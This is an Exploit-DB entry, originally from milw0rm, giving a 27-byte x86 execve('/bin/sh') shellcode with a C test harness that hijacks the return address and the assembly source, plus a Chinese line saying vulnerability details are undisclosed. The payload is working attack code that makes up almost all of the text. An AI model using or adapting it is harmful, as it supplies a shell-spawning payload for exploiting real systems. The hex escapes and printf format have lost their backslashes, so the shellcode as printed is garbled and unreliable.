https://www.exploit-db.com/exploits/13246

漏洞细节尚未披露

/* execve_sh.c by n0gada	
   27 bytes.
*/
#include <stdio.h>

char shellcode[]=
"xebx0dx5fx31xc0x50x89xe2"
"x52x57x54xb0x3bxcdx80xe8"
"xeexffxffxff/bin/sh";

int main(void)
{
 int *ret;

	printf("%dn",strlen(shellcode));	
	ret = (int *)&ret+2;
	*ret = (int)shellcode;

return 0;

}

/*********************************************
execve_sh.s

	.globl main
	main:
		jmp strings
	start:
		pop %edi
		xorl %eax,%eax
		push %eax
		movl %esp,%edx
		push %edx
		push %edi
		push %esp
		movb $0x3b,%al
		int $0x80

	strings: call start
		.string "/bin/sh"

*********************************************/

// milw0rm.com [2004-09-26]